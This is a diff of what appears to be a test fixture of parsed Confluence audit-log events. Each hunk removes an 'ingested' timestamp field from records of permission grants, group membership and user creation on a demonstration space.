@@ -13138,7 +12995,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837593345Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.269Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -13234,7 +13090,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837594338Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.267Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -13330,7 +13185,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837595220Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.265Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -13419,7 +13273,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837596092Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.262Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -13515,7 +13368,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837597074Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.259Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -13611,7 +13463,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837597947Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.257Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -13707,7 +13558,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837598938Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.255Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"SETSPACEPERMISSIONS\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -13796,7 +13646,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837599856Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.253Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -13892,7 +13741,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837600766Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.251Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -13988,7 +13836,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837601696Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.249Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -14077,7 +13924,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837602564Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.247Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -14173,7 +14019,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837603454Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.245Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -14269,7 +14114,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837604791Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.242Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -14358,7 +14202,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837605707Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.240Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -14454,7 +14297,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837606616Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.238Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -14550,7 +14392,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837607592Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.235Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -14639,7 +14480,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837608516Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.231Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -14735,7 +14575,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837609566Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.219Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -14831,7 +14670,6 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-24T00:46:29.837610741Z", "original": "{\"timestamp\":\"2021-11-23T00:35:04.192Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"Demonstration Space\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ds\",\"id\":\"98305\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ds\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -14913,7 +14751,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:46:29.837611661Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.950Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"admin\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", 
@@ -15002,7 +14839,6 @@ }, "event": { "action": "audit.logging.summary.group.membership.added", - "ingested": "2021-12-24T00:46:29.837612656Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.924Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.group.membership.added\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"admin\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", 
@@ -15107,7 +14943,6 @@ }, "event": { "action": "audit.logging.summary.user.created", - "ingested": "2021-12-24T00:46:29.837614041Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.860Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.user.management\",\"category\":\"Users and groups\",\"actionI18nKey\":\"audit.logging.summary.user.created\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"}],\"changedValues\":[{\"key\":\"Active\",\"i18nKey\":\"Active\",\"to\":\"Yes\"},{\"key\":\"Display name\",\"i18nKey\":\"Display name\",\"to\":\"test user\"},{\"key\":\"Email\",\"i18nKey\":\"Email\",\"to\":\"test.user@example.com\"},{\"key\":\"Username\",\"i18nKey\":\"Username\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "user", 
@@ -15201,7 +15036,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837614920Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.253Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATESPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -15286,7 +15120,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837615799Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.251Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"CREATESPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -15371,7 +15204,6 @@ }, "event": { "action": "audit.logging.summary.global.permission.added", - "ingested": "2021-12-24T00:46:29.837616671Z", "original": "{\"timestamp\":\"2021-11-23T00:35:03.250Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"PERSONALSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
